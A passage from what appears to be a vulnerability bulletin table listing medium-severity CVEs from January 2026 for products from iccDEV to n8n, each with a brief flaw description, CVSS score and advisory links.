| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccTag:IsTypeCompressed()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 5.4 | CVE-2026-21691 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c9q5-x498-jv92 https://github.com/InternationalColorConsortium/iccDEV/issues/392 https://github.com/InternationalColorConsortium/iccDEV/pull/426 |
| INTINITUM FORM--Geo Controller | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in INTINITUM FORM Geo Controller allows DOM-Based XSS.This issue affects Geo Controller: from n/a through 8.5.2. | 2026-01-05 | 6.5 | CVE-2023-51513 | https://vdp.patchstack.com/database/wordpress/plugin/cf-geoplugin/vulnerability/wordpress-geo-controller-plugin-8-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| itsourcecode--Society Management System | A vulnerability was identified in itsourcecode Society Management System 1.0. This affects an unknown part of the file /admin/edit_activity_query.php. The manipulation of the argument Title leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-01-05 | 6.3 | CVE-2026-0582 | VDB-339474 | itsourcecode Society Management System edit_activity_query.php sql injection VDB-339474 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731207 | itsourcecode Society Management System V1.0 SQL Injection https://github.com/xiaotsai/tttt/issues/2 https://itsourcecode.com/ |
| ivole--Customer Reviews for WooCommerce | The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'displayName' parameter in all versions up to, and including, 5.93.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with customer-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. While it is possible to invoke the AJAX action without authentication, the attacker would need to know a valid form ID, which requires them to place an order. This vulnerability can be exploited by unauthenticated attackers if guest checkout is enabled. However, the form ID still needs to be obtained through placing an order. | 2026-01-07 | 6.4 | CVE-2025-14891 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88e4eec2-2861-4d1d-97eb-67887f59c745?source=cve https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/trunk/includes/reminders/class-cr-local-forms-ajax.php#L76 https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/trunk/templates/form-customer.php#L19 https://plugins.trac.wordpress.org/changeset/3424980/customer-reviews-woocommerce |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cross-site scripting vulnerability in the 'msg' parameter of pluginInstall.php that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated input to execute arbitrary JavaScript in victim browsers, potentially stealing authentication credentials and conducting phishing attacks. | 2026-01-07 | 6.1 | CVE-2019-25277 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange |
| jegstudio--Gutenverse Form Contact Form Builder, Booking, Reservation, Subscribe for Block Editor | The Gutenverse Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file upload in all versions up to, and including, 2.3.2. This is due to the plugin's framework component adding SVG to the allowed MIME types via the upload_mimes filter without implementing any sanitization of SVG file contents. This makes it possible for authenticated attackers, with Author-level access and above, to upload SVG files containing malicious JavaScript that executes when the file is viewed, leading to arbitrary JavaScript execution in victims' browsers. | 2026-01-08 | 6.4 | CVE-2025-14984 | https://www.wordfence.com/threat-intel/vulnerabilities/id/792fa6cb-e55a-4f68-b8a8-9039fb1ff694?source=cve https://plugins.trac.wordpress.org/browser/gutenverse-form/tags/2.3.2/lib/framework/includes/class-init.php#L837 https://plugins.trac.wordpress.org/browser/gutenverse-form/tags/2.3.2/lib/framework/includes/class-init.php#L169 https://plugins.trac.wordpress.org/changeset/3427504/gutenverse-form/trunk/lib/framework/includes/class-init.php?old=3395520&old_path=gutenverse-form%2Ftrunk%2Flib%2Fframework%2Fincludes%2Fclass-init.php |
| jegtheme--Jeg Kit for Elementor Powerful Addons for Elementor, Widgets & Templates for WordPress | The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.1 due to insufficient input sanitization in the countdown widget's redirect functionality. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript that will execute when an administrator or other user views the page containing the malicious countdown element. | 2026-01-08 | 6.4 | CVE-2025-14275 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8fcb4047-5173-4d10-a4bb-72f1919b9203?source=cve https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/tags/3.0.1/assets/js/elements/countdown.js#L1 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432624%40jeg-elementor-kit%2Ftrunk&old=3379532%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail= |
| jiujiujia--jjjfood | A vulnerability has been found in jiujiujia/victor123/wxw850227 jjjfood and jjjshop_food up to 20260103. This vulnerability affects unknown code of the file /index.php/api/product.category/index. Such manipulation of the argument latitude leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product is distributed under multiple different names. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 6.3 | CVE-2026-0843 | VDB-340443 | jiujiujia/victor123/wxw850227 jjjfood/jjjshop_food index sql injection VDB-340443 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731001 | https://www.jiujiujia.net/ PHP-based Three-Dot Ordering System Vulnerable to SQL Injection lasest SQL Injection http://101.200.76.102:38765/qwertyuiop/qwsdfvbnm/1/vuldb/JJJshop/EnglishVers%E4%B8%89%E5%8B%BE%E7%82%B9%E9%A4%90%E7%B3%BB%E7%BB%9FPHP%E7%89%88%E5%AD%98%E5%9C%A8product.category.indexSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.pdf |
| jonua--Table Field Add-on for ACF and SCF | The Table Field Add-on for ACF and SCF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Cell Content in all versions up to, and including, 1.3.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-12067 | https://www.wordfence.com/threat-intel/vulnerabilities/id/93f80716-a95b-49fc-805f-446d4723ca77?source=cve https://plugins.trac.wordpress.org/changeset/3386339/ |
| jseto--Travel Bucket List Wish To Go | The Wish To Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14053 | https://www.wordfence.com/threat-intel/vulnerabilities/id/02b9450e-422f-45f1-a55b-cf401e39247c?source=cve https://plugins.trac.wordpress.org/browser/wish-to-go/trunk/wish-to-go.php#L124 https://plugins.trac.wordpress.org/browser/wish-to-go/tags/0.5.2/wish-to-go.php#L124 |
| kanboard--kanboard | Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below have an LDAP Injection vulnerability in the LDAP authentication mechanism. User-supplied input is directly substituted into LDAP search filters without proper sanitization, allowing attackers to enumerate all LDAP users, discover sensitive user attributes, and perform targeted attacks against specific accounts. This issue is fixed in version 1.2.49. | 2026-01-08 | 5.3 | CVE-2026-21880 | https://github.com/kanboard/kanboard/security/advisories/GHSA-v66r-m28r-wmq7 https://github.com/kanboard/kanboard/commit/dd374079f7c2d1dab74c1680960e684ff8668586 https://github.com/kanboard/kanboard/releases/tag/v1.2.49 |
| kanboard--kanboard | Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below are vulnerable to an Open Redirect attack that allows malicious actors to redirect authenticated users to attacker-controlled websites. By crafting URLs such as //evil.com, attackers can bypass the filter_var($url, FILTER_VALIDATE_URL) validation check. This vulnerability could be exploited to conduct phishing attacks, steal user credentials, or distribute malware. The issue is fixed in version 1.2.49. | 2026-01-08 | 4.7 | CVE-2026-21879 | https://github.com/kanboard/kanboard/security/advisories/GHSA-mhv9-7m9w-7hcq https://github.com/kanboard/kanboard/commit/93bcae03301a6d34185a8dba977417e6b3de519f https://github.com/kanboard/kanboard/releases/tag/v1.2.49 |
| kentothemes--Latest Tabs | The Latest Tabs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings update handler in admin-page.php. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14999 | https://www.wordfence.com/threat-intel/vulnerabilities/id/837f49e6-dcba-4451-bbbe-14890ab87207?source=cve https://plugins.trac.wordpress.org/browser/kento-latest-tabs/trunk/admin-page.php#L7 |
| kodezen--aBlocks WordPress Gutenberg Blocks, User Dashboard Builder, Popup Builder, Form Builder & GSAP Animation Builder | The aBlocks - WordPress Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data and disclosure of sensitive information due to missing capability checks on multiple AJAX actions in all versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with subscriber level access and above, to read plugin settings including block visibility, maintenance mode configuration, and third-party email marketing API keys, as well as read sensitive configuration data including API keys for email marketing services. | 2026-01-07 | 5.4 | CVE-2025-12449 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c10600ae-1ff0-4f12-ae53-39d9342640f4?source=cve https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/ajax/settings.php#L16 https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/classes/abstract-request-handler.php#L486 https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/assets.php#L353 |
| kromitgmbh--titra | Titra is open source project time tracking software. Versions 0.99.49 and below have Improper Access Control, allowing users to view and edit other users' time entries in private projects they have not been granted access to. This issue is fixed in version 0.99.50. | 2026-01-07 | 6.8 | CVE-2026-21694 | https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938 |
| kromitgmbh--titra | Titra is open source project time tracking software. In versions 0.99.49 and below, an API has a Mass Assignment vulnerability which allows authenticated users to inject arbitrary fields into time entries, bypassing business logic controls via the customfields parameter. The affected endpoint uses the JavaScript spread operator (...customfields) to merge user-controlled input directly into the database document. While customfields is validated as an Object type, there is no validation of which keys are permitted inside that object. This allows attackers to overwrite protected fields such as userId, hours, and state. The issue is fixed in version 0.99.50. | 2026-01-07 | 4.3 | CVE-2026-21695 | https://github.com/kromitgmbh/titra/security/advisories/GHSA-gc65-vr47-jppq https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938 |
| Leica Geosystems AG--Leica Geosystems GR10/GR25/GR30/GR50 GNSS | Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. Attackers can trick logged-in users into executing unauthorized actions by crafting malicious web pages that submit requests to the application. | 2026-01-07 | 5.3 | CVE-2019-25259 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 46090 Packet Storm Security Exploit File IBM X-Force Vulnerability Exchange Entry Leica Geosystems Vendor Homepage |
| liangshao--Flashcard Plugin for WordPress | The Flashcard plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 0.9 via the 'source' attribute of the 'flashcard' shortcode. This makes it possible for authenticated attackers, with contributor level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-01-07 | 6.5 | CVE-2025-14867 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fcc6e5-1f90-41e7-8d5a-2bfe8cbf46fa?source=cve https://plugins.trac.wordpress.org/browser/flashcard/tags/0.9/flashcard.php?marks=73,109#L73 |
| lnbadmin1--Nearby Now Reviews | The Nearby Now Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data_tech' parameter of the nn-tech shortcode in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13853 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8dc991ea-0d00-4734-9b9a-5af759e83540?source=cve https://plugins.trac.wordpress.org/browser/nearby-now-reviews/trunk/nn-reviews.php#L160 https://plugins.trac.wordpress.org/browser/nearby-now-reviews/tags/5.2/nn-reviews.php#L160 |
| loopus--WP Cost Estimation & Payment Forms Builder | The WP Cost Estimation plugin for WordPress is vulnerable to Upload Directory Traversal in versions before 9.660 via the uploadFormFiles function. This allows attackers to overwrite any file with a whitelisted type on an affected site. | 2026-01-08 | 6.5 | CVE-2019-25295 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65a9e877-e870-4e36-985d-c0629abe3f78?source=cve https://www.wordfence.com/blog/2019/02/vulnerabilities-patched-in-wp-cost-estimation-plugin/ https://codecanyon.net/item/wp-cost-estimation-payment-forms-builder/7818230 |
| mamurjor--Mamurjor Employee Info | The Mamurjor Employee Info plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on multiple administrative functions. This makes it possible for unauthenticated attackers to create, update, or delete employee records, departments, designations, salary grades, education records, and salary payments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13990 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8e323b87-7b2e-4e5c-94a4-a4a0712f50ba?source=cve https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/trunk/admin/admin.php#L10 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/trunk/admin/admin.php#L30 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/trunk/admin/admin.php#L47 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/tags/1.0.0/admin/admin.php#L10 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/tags/1.0.0/admin/admin.php#L30 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/tags/1.0.0/admin/admin.php#L47 |
| manchumahara--CBX Bookmark & Favorite | The CBX Bookmark & Favorite plugin for WordPress is vulnerable to generic SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 6.5 | CVE-2025-13652 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve https://plugins.trac.wordpress.org/changeset/3413499/ |
| marceljm--Featured Image from URL (FIFU) | The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.3.1. This is due to insufficient validation of user-supplied URLs before passing them to the getimagesize() function in the Elementor widget integration. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services via the fifu_input_url parameter in the FIFU Elementor widget granted they have permissions to use Elementor. | 2026-01-10 | 4.3 | CVE-2025-13393 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b7115070-b84d-4d69-993a-f512b9f9c081?source=cve https://plugins.trac.wordpress.org/browser/featured-image-from-url/trunk/elementor/widgets/widget.php#L94 https://plugins.trac.wordpress.org/browser/featured-image-from-url/trunk/elementor/widgets/widget.php#L121 https://research.cleantalk.org/cve-2025-13393/ https://plugins.trac.wordpress.org/changeset/3428744/ |
| Marketing Fire, LLC--LoginWP - Pro | Missing Authorization vulnerability in Marketing Fire, LLC LoginWP - Pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects LoginWP - Pro: from n/a through 4.0.8.5. | 2026-01-05 | 6.5 | CVE-2025-39561 | https://vdp.patchstack.com/database/wordpress/plugin/loginwp-pro/vulnerability/wordpress-loginwp-pro-plugin-4-0-8-5-broken-access-control-vulnerability?_s_id=cve |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon 4.3 added notifications of severed relationships, allowing end-users to inspect the relationships they lost as the result of a moderation action. The code allowing users to download lists of severed relationships for a particular event fails to check the owner of the list before returning the lost relationships. Any registered local user can access the list of lost followers and followed users caused by any severance event, and go through all severance events this way. The leaked information does not include the name of the account which has lost follows and followers. This has been fixed in Mastodon v4.3.17, v4.4.11 and v4.5.4. | 2026-01-08 | 6.5 | CVE-2026-22246 | https://github.com/mastodon/mastodon/security/advisories/GHSA-ww85-x9cp-5v24 https://github.com/mastodon/mastodon/commit/68e30985ca7afdb89af1b2e9dc962e1993dc8076 https://github.com/mastodon/mastodon/commit/b2bcd34486fd6681cc0f30028086ef0f47282adf https://github.com/mastodon/mastodon/commit/c1fb6893c5175d74c074f6f786d504c8bc610d57 |
| matiasanca--Cool YT Player | The Cool YT Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'videoid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13849 | https://www.wordfence.com/threat-intel/vulnerabilities/id/590bdf82-8006-4729-96e5-42b0d1552d19?source=cve https://plugins.trac.wordpress.org/browser/cool-yt-player/trunk/includes/youtube_video_wrapper.php#L58 https://plugins.trac.wordpress.org/browser/cool-yt-player/tags/1.0/includes/youtube_video_wrapper.php#L58 |
| mattiaspkallio--Snillrik Restaurant | The Snillrik Restaurant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'menu_style' shortcode attribute in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14112 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5fb52c19-6816-423d-ab3a-6b5b2ff21e03?source=cve https://plugins.trac.wordpress.org/browser/snillrik-restaurant-menu/trunk/classes/shortcodes.php#L42 https://plugins.trac.wordpress.org/browser/snillrik-restaurant-menu/tags/2.2.1/classes/shortcodes.php#L42 |
| metodiew--Quote Comments | The Quote Comments plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.0.0. This is due to missing authorization checks in the quotecomments_add_admin function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options via the 'action' parameter. | 2026-01-07 | 5.3 | CVE-2025-14370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ebe0767-db22-4995-bdf1-5ebb48f960e9?source=cve https://plugins.trac.wordpress.org/browser/quote-comments/tags/3.0.0/quote-comments.php#L309 |
| Microsoft--Microsoft Edge for Android | User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an authorized attacker to perform spoofing over a network. | 2026-01-07 | 5.5 | CVE-2025-62224 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability |
| miniflux--v2 | Miniflux 2 is an open source feed reader. Prior to version 2.2.16, Miniflux's media proxy endpoint (`GET /proxy/{encodedDigest}/{encodedURL}`) can be abused to perform Server-Side Request Forgery (SSRF). An authenticated user can cause Miniflux to generate a signed proxy URL for attacker-chosen media URLs embedded in feed entry content, including internal addresses (e.g., localhost, private RFC1918 ranges, or link-local metadata endpoints). Requesting the resulting `/proxy/...` URL makes Miniflux fetch and return the internal response. Version 2.2.16 fixes the issue. | 2026-01-08 | 6.5 | CVE-2026-21885 | https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp |
| minnur--External Media | Server-Side Request Forgery (SSRF) vulnerability in minnur External Media allows Server Side Request Forgery.This issue affects External Media: from n/a through 1.0.36. | 2026-01-07 | 4.9 | CVE-2025-49335 | https://patchstack.com/database/wordpress/plugin/external-media/vulnerability/wordpress-external-media-plugin-1-0-36-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| mitchoyoshitaka--Stumble! for WordPress | The Stumble! for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14128 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19e1421d-8cb4-44b6-a982-769539b19582?source=cve https://wordpress.org/plugins/stumble-for-wordpress/ https://plugins.trac.wordpress.org/browser/stumble-for-wordpress/trunk/stumble.php#L143 https://plugins.trac.wordpress.org/browser/stumble-for-wordpress/tags/1.1.1/stumble.php#L143 |
| mohammed_kaludi--AMP for WP Accelerated Mobile Pages | The AMP for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.1.10. This is due to insufficient sanitization of SVG file content that only removes `<script>` tags while allowing other XSS vectors such as event handlers (onload, onerror, onmouseover), foreignObject elements, and SVG animation attributes. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts via malicious SVG file uploads that will execute whenever a user views the uploaded file. | 2026-01-09 | 6.4 | CVE-2026-0627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ed23318-3b47-4336-a3aa-6b09f3911926?source=cve https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/trunk/templates/features.php#L10373 https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.10/templates/features.php#L10373 https://plugins.trac.wordpress.org/changeset/3434946/accelerated-mobile-pages/trunk/templates/features.php?old=3426181&old_path=accelerated-mobile-pages%2Ftrunk%2Ftemplates%2Ffeatures.php |
| mohammed_kaludi--AMP for WP Accelerated Mobile Pages | The AMP for WP - Accelerated Mobile Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.9. This is due to inverted nonce verification logic in the amp_theme_ajaxcomments AJAX handler, which rejects requests with VALID nonces and accepts requests with MISSING or INVALID nonces. This makes it possible for unauthenticated attackers to submit comments on behalf of logged-in users via a forged request granted they can trick a user into performing an action such as clicking on a link, and the plugin's template mode is enabled. | 2026-01-07 | 4.3 | CVE-2025-14468 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d195034-4617-474d-a4b1-b299c1607f89?source=cve https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.9/templates/template-mode/template-mode.php#L119 https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.9/templates/template-mode/template-mode.php#L50 https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.9/templates/template-mode/template-mode.php#L698 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3426181%40accelerated-mobile-pages%2Ftrunk&old=3402644%40accelerated-mobile-pages%2Ftrunk&sfp_email=&sfph_mail=#file4 |
| moosend--Moosend Landing Pages | The Moosend Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the moosend_landings_auth_get function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the 'moosend_landing_api_key' option value. | 2026-01-07 | 5.3 | CVE-2025-13496 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eeb4b3b1-47ae-4314-a386-832949456f81?source=cve https://plugins.trac.wordpress.org/browser/moosend-landing-pages/trunk/forms/auth-request.php#L7 https://plugins.trac.wordpress.org/browser/moosend-landing-pages/tags/1.1.6/forms/auth-request.php#L7 |
| mountaingrafix--MG AdvancedOptions | The MG AdvancedOptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13892 | https://www.wordfence.com/threat-intel/vulnerabilities/id/86358a01-bf69-4a7f-8b78-a0d42d362d96?source=cve https://plugins.trac.wordpress.org/browser/mg-advancedoptions/trunk/mg-advancedoptions/MG_AdvancedOptions.php#L96 https://plugins.trac.wordpress.org/browser/mg-advancedoptions/trunk/mg-advancedoptions/MG_AdvancedOptions.php#L58 |
| mstoic--Mstoic Shortcodes | The Mstoic Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'start' parameter of the ms_youtube_embeds shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14144 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e83c039-9b15-4e0c-8b07-3b906938c138?source=cve https://plugins.trac.wordpress.org/browser/mstoic-shortcodes/trunk/functions/shortcodes/youtube_embeds.php#L117 https://plugins.trac.wordpress.org/browser/mstoic-shortcodes/tags/2.0/functions/shortcodes/youtube_embeds.php#L117 |
| mtcaptcha--MTCaptcha WordPress Plugin | The MTCaptcha WordPress Plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.2. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin settings, including sensitive values like the private key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13520 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e8c1e568-7170-40d6-b522-2c89725e0501?source=cve https://plugins.trac.wordpress.org/browser/mtcaptcha/trunk/mt-captcha.php#L410 https://plugins.trac.wordpress.org/browser/mtcaptcha/tags/2.7.2/mt-captcha.php#L410 |
| Munir Kamal--Block Slider | Missing Authorization vulnerability in Munir Kamal Block Slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Block Slider: from n/a through 2.2.3. | 2026-01-08 | 6.5 | CVE-2026-22522 | https://patchstack.com/database/wordpress/plugin/block-slider/vulnerability/wordpress-block-slider-plugin-2-2-3-broken-access-control-vulnerability?_s_id=cve |
| N/A--Elliptic | The ECDSA implementation of the Elliptic package generates incorrect signatures if an interim value of 'k' (as computed based on step 3.2 of RFC 6979 https://datatracker.ietf.org/doc/html/rfc6979 ) has leading zeros and is susceptible to cryptanalysis, which can lead to secret key exposure. This happens, because the byte-length of 'k' is incorrectly computed, resulting in its getting truncated during the computation. Legitimate transactions or communications will be broken as a result. Furthermore, due to the nature of the fault, attackers could-under certain conditions-derive the secret key, if they could get their hands on both a faulty signature generated by a vulnerable version of Elliptic and a correct signature for the same inputs. This issue affects all known versions of Elliptic (at the time of writing, versions less than or equal to 6.6.1). | 2026-01-08 | 5.6 | CVE-2025-14505 | https://www.herodevs.com/vulnerability-directory/cve-2025-14505 https://github.com/indutny/elliptic/issues/321 |
| n/a--invoiceninja | A security vulnerability has been detected in invoiceninja up to 5.12.38. The affected element is the function copy of the file /app/Jobs/Util/Import.php of the component Migration Import. The manipulation of the argument company_logo leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-07 | 4.7 | CVE-2026-0649 | VDB-339720 | invoiceninja Migration Import Import.php copy server-side request forgery VDB-339720 | CTI Indicators (IOB, IOC, IOA) Submit #721323 | invoiceninja <= 5.12.38. ssrf https://note-hxlab.wetolink.com/share/fWqEpn5fX4rH |
| n/a--milvus | A security vulnerability has been detected in milvus up to 2.6.7. This vulnerability affects the function expr.Exec of the file pkg/util/expr/expr.go of the component HTTP Endpoint. The manipulation of the argument code leads to deserialization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. A fix is planned for the next release 2.6.8. | 2026-01-05 | 6.3 | CVE-2025-15453 | VDB-339486 | milvus HTTP Endpoint expr.go expr.Exec deserialization VDB-339486 | CTI Indicators (IOB, IOC, IOA) Submit #719061 | milvus-io milvus latest Not Safe Remote Expression Execution https://github.com/milvus-io/milvus/issues/46442 https://github.com/milvus-io/milvus/issues/46442#issuecomment-3672197450 https://github.com/milvus-io/milvus/issues/46442#issue-3743414836 https://github.com/milvus-io/milvus/milestone/139 |
| n8n-io--n8n | n8n is an open source workflow automation platform. In versions from 0.150.0 to before 2.2.2, an authentication bypass vulnerability in the Stripe Trigger node allows unauthenticated parties to trigger workflows by sending forged Stripe webhook events. The Stripe Trigger creates and stores a Stripe webhook signing secret when registering the webhook endpoint, but incoming webhook requests were not verified against this secret. As a result, any HTTP client that knows the webhook URL could send a POST request containing a matching event type, causing the workflow to execute as if a legitimate Stripe event had been received. This issue affects n8n users who have active workflows using the Stripe Trigger node. An attacker could potentially fake payment or subscription events and influence downstream workflow behavior. The practical risk is reduced by the fact that the webhook URL contains a high-entropy UUID; however, authenticated n8n users with access to the workflow can view this webhook ID. This issue has been patched in version 2.2.2. A temporary workaround for this issue involves users deactivating affected workflows or restricting access to workflows containing Stripe Trigger nodes to trusted users only. | 2026-01-08 | 6.5 | CVE-2026-21894 | https://github.com/n8n-io/n8n/security/advisories/GHSA-jf52-3f2h-h9j5 https://github.com/n8n-io/n8n/pull/22764 https://github.com/n8n-io/n8n/commit/a61a5991093c41863506888336e808ac1eff8d59 |
